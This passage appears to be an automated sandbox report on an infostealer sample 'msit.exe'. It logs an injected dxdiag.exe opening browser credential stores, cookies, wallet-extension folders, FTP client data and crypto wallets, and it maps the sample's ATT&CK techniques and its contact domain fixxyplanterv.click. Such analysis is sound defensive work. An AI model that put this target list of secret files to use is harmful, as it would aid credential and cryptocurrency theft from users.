              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
              Source: Yara matchFile source: Process Memory Space: dxdiag.exe PID: 1984, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: dxdiag.exe PID: 1984, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure1
              Replication Through Removable Media
              2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Disable or Modify Tools
              2
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              21
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Command and Scripting Interpreter
              Boot or Logon Initialization Scripts311
              Process Injection
              1
              Deobfuscate/Decode Files or Information
              LSASS Memory11
              Peripheral Device Discovery
              Remote Desktop Protocol41
              Data from Local System
              2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
              Obfuscated Files or Information
              Security Account Manager12
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Screen Capture
              113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Timestomp
              NTDS24
              System Information Discovery
              Distributed Component Object Model2
              Clipboard Data
              Protocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading
              LSA Secrets221
              Security Software Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              File Deletion
              Cached Domain Credentials11
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items121
              Masquerading
              DCSync1
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
              Virtualization/Sandbox Evasion
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt311
              Process Injection
              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589843 Sample: msit.exe Startdate: 13/01/2025 Architecture: WINDOWS Score: 100 43 fixxyplanterv.click 2->43 47 Suricata IDS alerts for network traffic 2->47 49 Found malware configuration 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 4 other signatures 2->53 8 msiexec.exe 11 41 2->8         started        12 msit.exe 40 2->12         started        signatures3 process4 file5 27 C:\Windows\Installer\MSIA455.tmp, PE32+ 8->27 dropped 29 C:\Windows\Installer\MSIA2EC.tmp, PE32 8->29 dropped 31 C:\Windows\Installer\MSIA2BC.tmp, PE32 8->31 dropped 39 5 other malicious files 8->39 dropped 63 Drops executables to the windows directory (C:\Windows) and starts them 8->63 14 MSIA455.tmp 8->14         started        17 msiexec.exe 8->17         started        19 msiexec.exe 8->19         started        33 C:\Users\user\AppData\Local\...\MSIA708.tmp, PE32 12->33 dropped 35 C:\Users\user\AppData\Local\...\MSIA6C8.tmp, PE32 12->35 dropped 37 C:\Users\user\AppData\Local\...\MSI98DD.tmp, PE32 12->37 dropped 41 9 other files (8 malicious) 12->41 dropped 21 msiexec.exe 12->21         started        signatures6 process7 signatures8 65 Multi AV Scanner detection for dropped file 14->65 67 Machine Learning detection for dropped file 14->67 69 Writes to foreign memory regions 14->69 71 2 other signatures 14->71 23 dxdiag.exe 2 14->23         started        process9 dnsIp10 45 fixxyplanterv.click 104.21.6.116, 443, 49707, 49708 CLOUDFLARENETUS United States 23->45 55 Query firmware table information (likely to detect VMs) 23->55 57 Found many strings related to Crypto-Wallets (likely being stolen) 23->57 59 Tries to harvest and steal ftp login credentials 23->59 61 2 other signatures 23->61 signatures11

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              msit.exe5%ReversingLabs
              msit.exe10%VirustotalBrowse
              SourceDetectionScannerLabelLink
              C:\Windows\Installer\MSIA455.tmp100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\MSI96A2.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\MSI9720.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\MSI9760.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\MSI9790.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\MSI97FE.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\MSI982E.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\MSI986D.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\MSI98AD.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\MSI98DD.tmp0%ReversingLabs
